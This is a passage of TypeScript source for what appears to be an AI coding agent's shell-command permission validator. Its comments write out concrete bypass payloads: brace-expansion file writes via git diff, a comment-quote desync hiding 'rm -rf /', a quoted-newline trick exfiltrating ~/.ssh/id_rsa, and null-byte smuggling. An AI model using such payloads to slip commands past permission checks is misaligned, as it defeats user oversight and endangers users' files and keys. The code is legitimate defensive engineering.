stripped.1749 * Backslash-escaped braces (\{, \}) also suppress expansion.1750 */1751function validateBraceExpansion(context: ValidationContext): PermissionResult {1752 // Use pre-strip content to avoid false negatives from stripSafeRedirections1753 // creating backslash adjacencies (e.g., `\>/dev/null{a,b}` → `\{a,b}` after1754 // stripping, making isEscapedAtPosition think the brace is escaped).1755 const content = context.fullyUnquotedPreStrip17561757 // SECURITY: Check for MISMATCHED brace counts in fullyUnquoted content.1758 // A mismatch indicates that quoted braces (e.g., `'{'` or `"{"`) were1759 // stripped by extractQuotedContent, leaving unbalanced braces in the content1760 // we analyze. Our depth-matching algorithm below assumes balanced braces —1761 // with a mismatch, it closes at the WRONG position, missing commas that1762 // bash's algorithm WOULD find.1763 //1764 // Exploit: `git diff {@'{'0},--output=/tmp/pwned}`1765 // - Original: 2 `{`, 2 `}` (quoted `'{'` counts as content, not operator)1766 // - fullyUnquoted: `git diff {@0},--output=/tmp/pwned}` — 1 `{`, 2 `}`!1767 // - Our depth-matcher: closes at first `}` (after `0`), inner=`@0`, no `,`1768 // - Bash (on original): quoted `{` is content; first unquoted `}` has no1769 // `,` yet → bash treats as literal content, keeps scanning → finds `,`1770 // → final `}` closes → expands to `@{0} --output=/tmp/pwned`1771 // - git writes diff to /tmp/pwned. ARBITRARY FILE WRITE, ZERO PERMISSIONS.1772 //1773 // We count ONLY unescaped braces (backslash-escaped braces are literal in1774 // bash). If counts mismatch AND at least one unescaped `{` exists, block —1775 // our depth-matching cannot be trusted on this content.1776 let unescapedOpenBraces = 01777 let unescapedCloseBraces = 01778 for (let i = 0; i < content.length; i++) {1779 if (content[i] === '{' && !isEscapedAtPosition(content, i)) {1780 unescapedOpenBraces++1781 } else if (content[i] === '}' && !isEscapedAtPosition(content, i)) {1782 unescapedCloseBraces++1783 }1784 }1785 // Only block when CLOSE count EXCEEDS open count — this is the specific1786 // attack signature. More `}` than `{` means a quoted `{` was stripped1787 // (bash saw it as content, we see extra `}` unaccounted for). The inverse1788 // (more `{` than `}`) is usually legitimate unclosed/escaped braces like1789 // `{foo` or `{a,b\}` where bash doesn't expand anyway.1790 if (unescapedOpenBraces > 0 && unescapedCloseBraces > unescapedOpenBraces) {1791 logEvent('tengu_bash_security_check_triggered', {1792 checkId: BASH_SECURITY_CHECK_IDS.BRACE_EXPANSION,1793 subId: 2,1794 })1795 return {1796 behavior: 'ask',1797 message:1798 'Command has excess closing braces after quote stripping, indicating possible brace expansion obfuscation',1799 }1800 }18011802 // SECURITY: Additionally, check the ORIGINAL command (before quote stripping)1803 // for `'{'` or `"{"` INSIDE an unquoted brace context — this is the specific1804 // attack primitive. A quoted brace inside an outer unquoted `{...}` is1805 // essentially always an obfuscation attempt; legitimate commands don't nest1806 // quoted braces inside brace expansion (awk/find patterns are fully quoted,1807 // like `awk '{print $1}'` where the OUTER brace is inside quotes too).1808 //1809 // This catches the attack even if an attacker crafts a payload with balanced1810 // stripped braces (defense-in-depth). We use a simple heuristic: if the1811 // original command has `'{'` or `'}'` or `"{"` or `"}"` (quoted single brace)1812 // AND also has an unquoted `{`, that's suspicious.1813 if (unescapedOpenBraces > 0) {1814 const orig = context.originalCommand1815 // Look for quoted single-brace patterns: '{', '}', "{", "}"1816 // These are the attack primitive — a brace char wrapped in quotes.1817 if (/['"][{}]['"]/.test(orig)) {1818 logEvent('tengu_bash_security_check_triggered', {1819 checkId: BASH_SECURITY_CHECK_IDS.BRACE_EXPANSION,1820 subId: 3,1821 })1822 return {1823 behavior: 'ask',1824 message:1825 'Command contains quoted brace character inside brace context (potential brace expansion obfuscation)',1826 }1827 }1828 }18291830 // Scan for unescaped `{` characters, then check if they form brace expansion.1831 // We use a manual scan rather than a simple regex lookbehind because1832 // lookbehinds can't handle double-escaped backslashes (\\{ is unescaped `{`).1833 for (let i = 0; i < content.length; i++) {1834 if (content[i] !== '{') continue1835 if (isEscapedAtPosition(content, i)) continue18361837 // Find matching unescaped `}` by tracking nesting depth.1838 // Previous approach broke on nested `{`, missing commas between the outer1839 // `{` and the nested one (e.g., `{--upload-pack="evil",{test}}`).1840 let depth = 11841 let matchingClose = -11842 for (let j = i + 1; j < content.length; j++) {1843 const ch = content[j]1844 if (ch === '{' && !isEscapedAtPosition(content, j)) {1845 depth++1846 } else if (ch === '}' && !isEscapedAtPosition(content, j)) {1847 depth--1848 if (depth === 0) {1849 matchingClose = j1850 break1851 }1852 }1853 }18541855 if (matchingClose === -1) continue18561857 // Check for `,` or `..` at the outermost nesting level between this1858 // `{` and its matching `}`. Only depth-0 triggers matter — bash splits1859 // brace expansion at outer-level commas/sequences.1860 let innerDepth = 01861 for (let k = i + 1; k < matchingClose; k++) {1862 const ch = content[k]1863 if (ch === '{' && !isEscapedAtPosition(content, k)) {1864 innerDepth++1865 } else if (ch === '}' && !isEscapedAtPosition(content, k)) {1866 innerDepth--1867 } else if (innerDepth === 0) {1868 if (1869 ch === ',' ||1870 (ch === '.' && k + 1 < matchingClose && content[k + 1] === '.')1871 ) {1872 logEvent('tengu_bash_security_check_triggered', {1873 checkId: BASH_SECURITY_CHECK_IDS.BRACE_EXPANSION,1874 subId: 1,1875 })1876 return {1877 behavior: 'ask',1878 message:1879 'Command contains brace expansion that could alter command parsing',1880 }1881 }1882 }1883 }1884 // No expansion at this level — don't skip past; inner pairs will be1885 // caught by subsequent iterations of the outer loop.1886 }18871888 return {1889 behavior: 'passthrough',1890 message: 'No brace expansion detected',1891 }1892}18931894// Matches Unicode whitespace characters that shell-quote treats as word1895// separators but bash treats as literal word content. While this differential1896// is defense-favorable (shell-quote over-splits), blocking these proactively1897// prevents future edge cases.1898// eslint-disable-next-line no-misleading-character-class1899const UNICODE_WS_RE =1900 /[\u00A0\u1680\u2000-\u200A\u2028\u2029\u202F\u205F\u3000\uFEFF]/19011902function validateUnicodeWhitespace(1903 context: ValidationContext,1904): PermissionResult {1905 const { originalCommand } = context1906 if (UNICODE_WS_RE.test(originalCommand)) {1907 logEvent('tengu_bash_security_check_triggered', {1908 checkId: BASH_SECURITY_CHECK_IDS.UNICODE_WHITESPACE,1909 })1910 return {1911 behavior: 'ask',1912 message:1913 'Command contains Unicode whitespace characters that could cause parsing inconsistencies',1914 }1915 }1916 return { behavior: 'passthrough', message: 'No Unicode whitespace' }1917}19181919function validateMidWordHash(context: ValidationContext): PermissionResult {1920 const { unquotedKeepQuoteChars } = context1921 // Match # preceded by a non-whitespace character (mid-word hash).1922 // shell-quote treats mid-word # as comment-start but bash treats it as a1923 // literal character, creating a parser differential.1924 //1925 // Uses unquotedKeepQuoteChars (which preserves quote delimiters but strips1926 // quoted content) to catch quote-adjacent # like 'x'# — fullyUnquotedPreStrip1927 // would strip both quotes and content, turning 'x'# into just # (word-start).1928 //1929 // SECURITY: Also check the CONTINUATION-JOINED version. The context is built1930 // from the original command (pre-continuation-join). For `foo\<NL>#bar`,1931 // pre-join the `#` is preceded by `\n` (whitespace → `/\S#/` doesn't match),1932 // but post-join it's preceded by `o` (non-whitespace → matches). shell-quote1933 // operates on the post-join text (line continuations are joined in1934 // splitCommand), so the parser differential manifests on the joined text.1935 // While not directly exploitable (the `#...` fragment still prompts as its1936 // own subcommand), this is a defense-in-depth gap — shell-quote would drop1937 // post-`#` content from path extraction.1938 //1939 // Exclude ${# which is bash string-length syntax (e.g., ${#var}).1940 // Note: the lookbehind must be placed immediately before # (not before \S)1941 // so that it checks the correct 2-char window.1942 const joined = unquotedKeepQuoteChars.replace(/\\+\n/g, match => {1943 const backslashCount = match.length - 11944 return backslashCount % 2 === 1 ? '\\'.repeat(backslashCount - 1) : match1945 })1946 if (1947 // eslint-disable-next-line custom-rules/no-lookbehind-regex -- .test() with atom search: fast when # absent1948 /\S(?<!\$\{)#/.test(unquotedKeepQuoteChars) ||1949 // eslint-disable-next-line custom-rules/no-lookbehind-regex -- same as above1950 /\S(?<!\$\{)#/.test(joined)1951 ) {1952 logEvent('tengu_bash_security_check_triggered', {1953 checkId: BASH_SECURITY_CHECK_IDS.MID_WORD_HASH,1954 })1955 return {1956 behavior: 'ask',1957 message:1958 'Command contains mid-word # which is parsed differently by shell-quote vs bash',1959 }1960 }1961 return { behavior: 'passthrough', message: 'No mid-word hash' }1962}19631964/**1965 * Detects when a `#` comment contains quote characters that would desync1966 * downstream quote trackers (like extractQuotedContent).1967 *1968 * In bash, everything after an unquoted `#` on a line is a comment — quote1969 * characters inside the comment are literal text, not quote toggles. But our1970 * quote-tracking functions don't handle comments, so a `'` or `"` after `#`1971 * toggles their quote state. Attackers can craft `# ' "` sequences that1972 * precisely desync the tracker, causing subsequent content (on following1973 * lines) to appear "inside quotes" when it's actually unquoted in bash.1974 *1975 * Example attack:1976 * echo "it's" # ' " <<'MARKER'\n1977 * rm -rf /\n1978 * MARKER1979 * In bash: `#` starts a comment, `rm -rf /` executes on line 2.1980 * In extractQuotedContent: the `'` at position 14 (after #) opens a single1981 * quote, and the `'` before MARKER closes it. But the `'` after MARKER opens1982 * ANOTHER single quote, swallowing the newline and `rm -rf /`, so1983 * validateNewlines sees no unquoted newlines.1984 *1985 * Defense: If we see an unquoted `#` followed by any quote character on the1986 * same line, treat it as a misparsing concern. Legitimate commands rarely1987 * have quote characters in their comments (and if they do, the user can1988 * approve manually).1989 */1990function validateCommentQuoteDesync(1991 context: ValidationContext,1992): PermissionResult {1993 // Tree-sitter path: tree-sitter correctly identifies comment nodes and1994 // quoted content. The desync concern is about regex quote tracking being1995 // confused by quote characters inside comments. When tree-sitter provides1996 // the quote context, this desync cannot happen — the AST is authoritative1997 // regardless of whether the command contains a comment.1998 if (context.treeSitter) {1999 return {2000 behavior: 'passthrough',2001 message: 'Tree-sitter quote context is authoritative',2002 }2003 }20042005 const { originalCommand } = context20062007 // Track quote state character-by-character using the same (correct) logic2008 // as extractQuotedContent: single quotes don't toggle inside double quotes.2009 // When we encounter an unquoted `#`, check if the rest of the line (until2010 // newline) contains any quote characters.2011 let inSingleQuote = false2012 let inDoubleQuote = false2013 let escaped = false20142015 for (let i = 0; i < originalCommand.length; i++) {2016 const char = originalCommand[i]20172018 if (escaped) {2019 escaped = false2020 continue2021 }20222023 if (inSingleQuote) {2024 if (char === "'") inSingleQuote = false2025 continue2026 }20272028 if (char === '\\') {2029 escaped = true2030 continue2031 }20322033 if (inDoubleQuote) {2034 if (char === '"') inDoubleQuote = false2035 // Single quotes inside double quotes are literal — no toggle2036 continue2037 }20382039 if (char === "'") {2040 inSingleQuote = true2041 continue2042 }20432044 if (char === '"') {2045 inDoubleQuote = true2046 continue2047 }20482049 // Unquoted `#` — in bash, this starts a comment. Check if the rest of2050 // the line contains quote characters that would desync other trackers.2051 if (char === '#') {2052 const lineEnd = originalCommand.indexOf('\n', i)2053 const commentText = originalCommand.slice(2054 i + 1,2055 lineEnd === -1 ? originalCommand.length : lineEnd,2056 )2057 if (/['"]/.test(commentText)) {2058 logEvent('tengu_bash_security_check_triggered', {2059 checkId: BASH_SECURITY_CHECK_IDS.COMMENT_QUOTE_DESYNC,2060 })2061 return {2062 behavior: 'ask',2063 message:2064 'Command contains quote characters inside a # comment which can desync quote tracking',2065 }2066 }2067 // Skip to end of line (rest is comment)2068 if (lineEnd === -1) break2069 i = lineEnd // Loop increment will move past newline2070 }2071 }20722073 return { behavior: 'passthrough', message: 'No comment quote desync' }2074}20752076/**2077 * Detects a newline inside a quoted string where the NEXT line would be2078 * stripped by stripCommentLines (trimmed line starts with `#`).2079 *2080 * In bash, `\n` inside quotes is a literal character and part of the argument.2081 * But stripCommentLines (called by stripSafeWrappers in bashPermissions before2082 * path validation and rule matching) processes commands LINE-BY-LINE via2083 * `command.split('\n')` without tracking quote state. A quoted newline lets an2084 * attacker position the next line to start with `#` (after trim), causing2085 * stripCommentLines to drop that line entirely — hiding sensitive paths or2086 * arguments from path validation and permission rule matching.2087 *2088 * Example attack (auto-allowed in acceptEdits mode without any Bash rules):2089 * mv ./decoy '<\n>#' ~/.ssh/id_rsa ./exfil_dir2090 * Bash: moves ./decoy AND ~/.ssh/id_rsa into ./exfil_dir/ (errors on `\n#`).2091 * stripSafeWrappers: line 2 starts with `#` → stripped → "mv ./decoy '".2092 * shell-quote: drops unbalanced trailing quote → ["mv", "./decoy"].2093 * checkPathConstraints: only sees ./decoy (in cwd) → passthrough.2094 * acceptEdits mode: mv with all-cwd paths → ALLOW. Zero clicks, no warning.2095 *2096 * Also works with cp (exfil), rm/rm -rf (delete arbitrary files/dirs).2097 *2098 * Defense: block ONLY the specific stripCommentLines trigger — a newline inside2099 * quotes where the next line starts with `#` after trim. This is the minimal2100 * check that catches the parser differential while preserving legitimate2101 * multi-line quoted arguments (echo 'line1\nline2', grep patterns, etc.).2102 * Safe heredocs ($(cat <<'EOF'...)) and git commit -m "..." are handled by2103 * early validators and never reach this check.2104 *2105 * This validator is NOT in nonMisparsingValidators — its ask result gets2106 * isBashSecurityCheckForMisparsing: true, causing an early block in the2107 * permission flow at bashPermissions.ts before any line-based processing runs.2108 */2109function validateQuotedNewline(context: ValidationContext): PermissionResult {2110 const { originalCommand } = context21112112 // Fast path: must have both a newline byte AND a # character somewhere.2113 // stripCommentLines only strips lines where trim().startsWith('#'), so2114 // no # means no possible trigger.2115 if (!originalCommand.includes('\n') || !originalCommand.includes('#')) {2116 return { behavior: 'passthrough', message: 'No newline or no hash' }2117 }21182119 // Track quote state. Mirrors extractQuotedContent / validateCommentQuoteDesync:2120 // - single quotes don't toggle inside double quotes2121 // - backslash escapes the next char (but not inside single quotes)2122 // stripCommentLines splits on '\n' (not \r), so we only treat \n as a line2123 // separator. \r inside a line is removed by trim() and doesn't change the2124 // trimmed-starts-with-# check.2125 let inSingleQuote = false2126 let inDoubleQuote = false2127 let escaped = false21282129 for (let i = 0; i < originalCommand.length; i++) {2130 const char = originalCommand[i]21312132 if (escaped) {2133 escaped = false2134 continue2135 }21362137 if (char === '\\' && !inSingleQuote) {2138 escaped = true2139 continue2140 }21412142 if (char === "'" && !inDoubleQuote) {2143 inSingleQuote = !inSingleQuote2144 continue2145 }21462147 if (char === '"' && !inSingleQuote) {2148 inDoubleQuote = !inDoubleQuote2149 continue2150 }21512152 // A newline inside quotes: the NEXT line (from bash's perspective) starts2153 // inside a quoted string. Check if that line would be stripped by2154 // stripCommentLines — i.e., after trim(), does it start with `#`?2155 // This exactly mirrors: lines.filter(l => !l.trim().startsWith('#'))2156 if (char === '\n' && (inSingleQuote || inDoubleQuote)) {2157 const lineStart = i + 12158 const nextNewline = originalCommand.indexOf('\n', lineStart)2159 const lineEnd = nextNewline === -1 ? originalCommand.length : nextNewline2160 const nextLine = originalCommand.slice(lineStart, lineEnd)2161 if (nextLine.trim().startsWith('#')) {2162 logEvent('tengu_bash_security_check_triggered', {2163 checkId: BASH_SECURITY_CHECK_IDS.QUOTED_NEWLINE,2164 })2165 return {2166 behavior: 'ask',2167 message:2168 'Command contains a quoted newline followed by a #-prefixed line, which can hide arguments from line-based permission checks',2169 }2170 }2171 }2172 }21732174 return { behavior: 'passthrough', message: 'No quoted newline-hash pattern' }2175}21762177/**2178 * Validates that the command doesn't use Zsh-specific dangerous commands that2179 * can bypass security checks. These commands provide capabilities like loading2180 * kernel modules, raw file I/O, network access, and pseudo-terminal execution2181 * that circumvent normal permission checks.2182 *2183 * Also catches `fc -e` which can execute arbitrary editors on command history,2184 * and `emulate` which with `-c` is an eval-equivalent.2185 */2186function validateZshDangerousCommands(2187 context: ValidationContext,2188): PermissionResult {2189 const { originalCommand } = context21902191 // Extract the base command from the original command, stripping leading2192 // whitespace, env var assignments, and Zsh precommand modifiers.2193 // e.g., "FOO=bar command builtin zmodload" -> "zmodload"2194 const ZSH_PRECOMMAND_MODIFIERS = new Set([2195 'command',2196 'builtin',2197 'noglob',2198 'nocorrect',2199 ])2200 const trimmed = originalCommand.trim()2201 const tokens = trimmed.split(/\s+/)2202 let baseCmd = ''2203 for (const token of tokens) {2204 // Skip env var assignments (VAR=value)2205 if (/^[A-Za-z_]\w*=/.test(token)) continue2206 // Skip Zsh precommand modifiers (they don't change what command runs)2207 if (ZSH_PRECOMMAND_MODIFIERS.has(token)) continue2208 baseCmd = token2209 break2210 }22112212 if (ZSH_DANGEROUS_COMMANDS.has(baseCmd)) {2213 logEvent('tengu_bash_security_check_triggered', {2214 checkId: BASH_SECURITY_CHECK_IDS.ZSH_DANGEROUS_COMMANDS,2215 subId: 1,2216 })2217 return {2218 behavior: 'ask',2219 message: `Command uses Zsh-specific '${baseCmd}' which can bypass security checks`,2220 }2221 }22222223 // Check for `fc -e` which allows executing arbitrary commands via editor2224 // fc without -e is safe (just lists history), but -e specifies an editor2225 // to run on the command, effectively an eval2226 if (baseCmd === 'fc' && /\s-\S*e/.test(trimmed)) {2227 logEvent('tengu_bash_security_check_triggered', {2228 checkId: BASH_SECURITY_CHECK_IDS.ZSH_DANGEROUS_COMMANDS,2229 subId: 2,2230 })2231 return {2232 behavior: 'ask',2233 message:2234 "Command uses 'fc -e' which can execute arbitrary commands via editor",2235 }2236 }22372238 return {2239 behavior: 'passthrough',2240 message: 'No Zsh dangerous commands',2241 }2242}22432244// Matches non-printable control characters that have no legitimate use in shell2245// commands: 0x00-0x08, 0x0B-0x0C, 0x0E-0x1F, 0x7F. Excludes tab (0x09),2246// newline (0x0A), and carriage return (0x0D) which are handled by other2247// validators. Bash silently drops null bytes and ignores most control chars,2248// so an attacker can use them to slip metacharacters past our checks while2249// bash still executes them (e.g., "echo safe\x00; rm -rf /").2250// eslint-disable-next-line no-control-regex2251const CONTROL_CHAR_RE = /[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]/22522253/**2254 * @deprecated Legacy regex/shell-quote path. Only used when tree-sitter is2255 * unavailable. The primary gate is parseForSecurity (ast.ts).2256 */2257export function bashCommandIsSafe_DEPRECATED(2258 command: string,2259): PermissionResult {2260 // SECURITY: Block control characters before any other processing. Null bytes2261 // and other non-printable chars are silently dropped by bash but confuse our2262 // validators, allowing metacharacters adjacent to them to slip through.2263 if (CONTROL_CHAR_RE.test(command)) {2264 logEvent('tengu_bash_security_check_triggered', {2265 checkId: BASH_SECURITY_CHECK_IDS.CONTROL_CHARACTERS,2266 })2267 return {2268 behavior: 'ask',2269 message:2270 'Command contains non-printable control characters that could be used to bypass security checks',2271 isBashSecurityCheckForMisparsing: true,2272 }2273 }22742275 // SECURITY: Detect '\' patterns that exploit shell-quote's incorrect handling2276 // of backslashes inside single quotes. Must run before shell-quote parsing.2277 if (hasShellQuoteSingleQuoteBug(command)) {2278 return {2279 behavior: 'ask',2280 message:2281 'Command contains single-quoted backslash pattern that could bypass security checks',2282 isBashSecurityCheckForMisparsing: true,2283 }2284 }22852286 // SECURITY: Strip heredoc bodies before running security validators.2287 // Only strip bodies for quoted/escaped delimiters (<<'EOF', <<\EOF) where2288 // the body is literal text — $(), backticks, and ${} are NOT expanded.2289 // Unquoted heredocs (<<EOF) undergo full shell expansion, so their bodies2290 // may contain executable command substitutions that validators must see.2291 // When extractHeredocs bails out (can't parse safely), the raw command2292 // goes through all validators — which is the safe direction.2293 const { processedCommand } = extractHeredocs(command, { quotedOnly: true })22942295 const baseCommand = command.split(' ')[0] || ''2296 const { withDoubleQuotes, fullyUnquoted, unquotedKeepQuoteChars } =2297 extractQuotedContent(processedCommand, baseCommand === 'jq')22982299 const context: ValidationContext = {2300 originalCommand: command,2301 baseCommand,2302 unquotedContent: withDoubleQuotes,2303 fullyUnquotedContent: stripSafeRedirections(fullyUnquoted),2304 fullyUnquotedPreStrip: fullyUnquoted,2305 unquotedKeepQuoteChars,2306 }23072308 const earlyValidators = [2309 validateEmpty,2310 validateIncompleteCommands,2311 validateSafeCommandSubstitution,2312 validateGitCommit,2313 ]23142315 for (const validator of earlyValidators) {2316 const result = validator(context)2317 if (result.behavior === 'allow') {2318 return {2319 behavior: 'passthrough',2320 message:2321 result.decisionReason?.type === 'other' ||2322 result.decisionReason?.type === 'safetyCheck'2323 ? result.decisionReason.reason2324 : 'Command allowed',2325 }2326 }2327 if (result.behavior !== 'passthrough') {2328 return result.behavior === 'ask'2329 ? { ...result, isBashSecurityCheckForMisparsing: true as const }2330 : result2331 }2332 }23332334 // Validators that don't set isBashSecurityCheckForMisparsing — their ask2335 // results go through the standard permission flow rather than being blocked2336 // early. LF newlines and redirections are normal patterns that splitCommand2337 // handles correctly, not misparsing concerns.2338 //2339 // NOTE: validateCarriageReturn is NOT here — CR IS a misparsing concern.2340 // shell-quote's `[^\s]` treats CR as a word separator (JS `\s` ⊃ \r), but2341 // bash IFS does NOT include CR. splitCommand collapses CR→space, which IS2342 // misparsing. See validateCarriageReturn for the full attack trace.2343 const nonMisparsingValidators = new Set([2344 validateNewlines,2345 validateRedirections,2346 ])23472348 const validators = [2349 validateJqCommand,2350 validateObfuscatedFlags,2351 validateShellMetacharacters,2352 validateDangerousVariables,2353 // Run comment-quote-desync BEFORE validateNewlines: it detects cases where2354 // the quote tracker would miss newlines due to # comment desync.2355 validateCommentQuoteDesync,2356 // Run quoted-newline BEFORE validateNewlines: it detects the INVERSE case2357 // (newlines INSIDE quotes, which validateNewlines ignores by design). Quoted2358 // newlines let attackers split commands across lines so that line-based2359 // processing (stripCommentLines) drops sensitive content.2360 validateQuotedNewline,2361 // CR check runs BEFORE validateNewlines — CR is a MISPARSING concern2362 // (shell-quote/bash tokenization differential), LF is not.2363 validateCarriageReturn,2364 validateNewlines,2365 validateIFSInjection,2366 validateProcEnvironAccess,2367 validateDangerousPatterns,2368 validateRedirections,2369 validateBackslashEscapedWhitespace,2370 validateBackslashEscapedOperators,2371 validateUnicodeWhitespace,2372 validateMidWordHash,2373 validateBraceExpansion,2374 validateZshDangerousCommands,2375 // Run malformed token check last - other validators should catch specific patterns first2376 // (e.g., $() substitution, backticks, etc.) since they have more precise error messages2377 validateMalformedTokenInjection,2378 ]23792380 // SECURITY: We must NOT short-circuit when a non-misparsing validator2381 // returns 'ask' if there are still misparsing validators later in the list.2382 // Non-misparsing ask results are discarded at bashPermissions.ts:~1301-13032383 // (the gate only blocks when isBashSecurityCheckForMisparsing is set). If2384 // validateRedirections (index 10, non-misparsing) fires first on `>`, it2385 // returns ask-without-flag — but validateBackslashEscapedOperators (index 12,2386 // misparsing) would have caught `\;` WITH the flag. Short-circuiting lets a2387 // payload like `cat safe.txt \; echo /etc/passwd > ./out` slip through.2388 //2389 // Fix: defer non-misparsing ask results. Continue running validators; if any2390 // misparsing validator fires, return THAT (with the flag). Only if we reach2391 // the end without a misparsing ask, return the deferred non-misparsing ask.2392 let deferredNonMisparsingResult: PermissionResult | null = null2393 for (const validator of validators) {2394 const result = validator(context)2395 if (result.behavior === 'ask') {2396 if (nonMisparsingValidators.has(validator)) {2397 if (deferredNonMisparsingResult === null) {2398 deferredNonMisparsingResult = result2399 }2400 continue2401 }2402 return { ...result, isBashSecurityCheckForMisparsing: true as const }2403 }2404 }2405 if (deferredNonMisparsingResult !== null) {2406 return deferredNonMisparsingResult2407 }24082409 return {2410 behavior: 'passthrough',2411 message: 'Command passed all security checks',2412 }2413}24142415/**2416 * @deprecated Legacy regex/shell-quote path. Only used when tree-sitter is2417 * unavailable. The primary gate is parseForSecurity (ast.ts).2418 *2419 * Async version of bashCommandIsSafe that uses tree-sitter when available2420 * for more accurate parsing. Falls back to the sync regex version when2421 * tree-sitter is not available.2422 *2423 * This should be used by async callers (bashPermissions.ts, bashCommandHelpers.ts).2424 * Sync callers (readOnlyValidation.ts) should continue using bashCommandIsSafe().2425 */2426export async function bashCommandIsSafeAsync_DEPRECATED(2427 command: string,2428 onDivergence?: () => void,2429): Promise<PermissionResult> {2430 // Try to get tree-sitter analysis2431 const parsed = await ParsedCommand.parse(command)2432 const tsAnalysis = parsed?.getTreeSitterAnalysis() ?? null24332434 // If no tree-sitter, fall back to sync version2435 if (!tsAnalysis) {2436 return bashCommandIsSafe_DEPRECATED(command)2437 }24382439 // Run the same security checks but with tree-sitter enriched context.2440 // The early checks (control chars, shell-quote bug) don't benefit from2441 // tree-sitter, so we run them identically.2442 if (CONTROL_CHAR_RE.test(command)) {2443 logEvent('tengu_bash_security_check_triggered', {2444 checkId: BASH_SECURITY_CHECK_IDS.CONTROL_CHARACTERS,2445 })2446 return {2447 behavior: 'ask',2448 message:2449 'Command contains non-printable control characters that could be used to bypass security checks',2450 isBashSecurityCheckForMisparsing: true,2451 }2452 }24532454 if (hasShellQuoteSingleQuoteBug(command)) {2455 return {2456 behavior: 'ask',2457 message:2458 'Command contains single-quoted backslash pattern that could bypass security checks',2459 isBashSecurityCheckForMisparsing: true,2460 }2461 }24622463 const { processedCommand } = extractHeredocs(command, { quotedOnly: true })24642465 const baseCommand = command.split(' ')[0] || ''24662467 // Use tree-sitter quote context for more accurate analysis2468 const tsQuote = tsAnalysis.quoteContext2469 const regexQuote = extractQuotedContent(2470 processedCommand,2471 baseCommand === 'jq',2472 )24732474 // Use tree-sitter quote context as primary, but keep regex as reference2475 // for divergence logging2476 const withDoubleQuotes = tsQuote.withDoubleQuotes2477 const fullyUnquoted = tsQuote.fullyUnquoted2478 const unquotedKeepQuoteChars = tsQuote.unquotedKeepQuoteChars24792480 const context: ValidationContext = {2481 originalCommand: command,2482 baseCommand,2483 unquotedContent: withDoubleQuotes,2484 fullyUnquotedContent: stripSafeRedirections(fullyUnquoted),2485 fullyUnquotedPreStrip: fullyUnquoted,2486 unquotedKeepQuoteChars,2487 treeSitter: tsAnalysis,2488 }24892490 // Log divergence between tree-sitter and regex quote extraction.2491 // Skip for heredoc commands: tree-sitter strips (quoted) heredoc bodies2492 // to nothing while the regex path replaces them with placeholder strings2493 // (via extractHeredocs), so the two outputs can never match. Logging2494 // divergence for every heredoc command would poison the signal.2495 //2496 // onDivergence callback: when called in a fanout loop (bashPermissions.ts2497 // Promise.all over subcommands), the caller batches divergences into a2498 // single logEvent instead of N separate calls. Each logEvent triggers2499 // getEventMetadata() → buildProcessMetrics() → process.memoryUsage() →2500 // /proc/self/stat read; with memoized metadata these resolve as microtasks2501 // and starve the event loop (CC-643). Single-command callers omit the2502 // callback and get the original per-call logEvent behavior.2503 if (!tsAnalysis.dangerousPatterns.hasHeredoc) {2504 const hasDivergence =2505 tsQuote.fullyUnquoted !== regexQuote.fullyUnquoted ||2506 tsQuote.withDoubleQuotes !== regexQuote.withDoubleQuotes2507 if (hasDivergence) {2508 if (onDivergence) {2509 onDivergence()2510 } else {2511 logEvent('tengu_tree_sitter_security_divergence', {2512 quoteContextDivergence: true,2513 })2514 }2515 }2516 }25172518 const earlyValidators = [2519 validateEmpty,2520 validateIncompleteCommands,2521 validateSafeCommandSubstitution,2522 validateGitCommit,2523 ]25242525 for (const validator of earlyValidators) {2526 const result = validator(context)2527 if (result.behavior === 'allow') {2528 return {2529 behavior: 'passthrough',2530 message:2531 result.decisionReason?.type === 'other' ||2532 result.decisionReason?.type === 'safetyCheck'2533 ? result.decisionReason.reason2534 : 'Command allowed',2535 }2536 }2537 if (result.behavior !== 'passthrough') {2538 return result.behavior === 'ask'2539 ? { ...result, isBashSecurityCheckForMisparsing: true as const }2540 : result2541 }2542 }25432544 const nonMisparsingValidators = new Set([2545 validateNewlines,2546 validateRedirections,2547 ])25482549 const validators = [2550 validateJqCommand,2551 validateObfuscatedFlags,2552 validateShellMetacharacters,2553 validateDangerousVariables,2554 validateCommentQuoteDesync,2555 validateQuotedNewline,2556 validateCarriageReturn,2557 validateNewlines,2558 validateIFSInjection,2559 validateProcEnvironAccess,2560 validateDangerousPatterns,2561 validateRedirections,2562 validateBackslashEscapedWhitespace,2563 validateBackslashEscapedOperators,2564 validateUnicodeWhitespace,2565 validateMidWordHash,2566 validateBraceExpansion,2567 validateZshDangerousCommands,2568 validateMalformedTokenInjection,2569 ]25702571 let deferredNonMisparsingResult: PermissionResult | null = null2572 for (const validator of validators) {2573 const result = validator(context)2574 if (result.behavior === 'ask') {2575 if (nonMisparsingValidators.has(validator)) {2576 if (deferredNonMisparsingResult === null) {2577 deferredNonMisparsingResult = result2578 }2579 continue2580 }2581 return { ...result, isBashSecurityCheckForMisparsing: true as const }2582 }2583 }2584 if (deferredNonMisparsingResult !== null) {2585 return deferredNonMisparsingResult2586 }25872588 return {2589 behavior: 'passthrough',2590 message: 'Command passed all security checks',2591 }2592}2593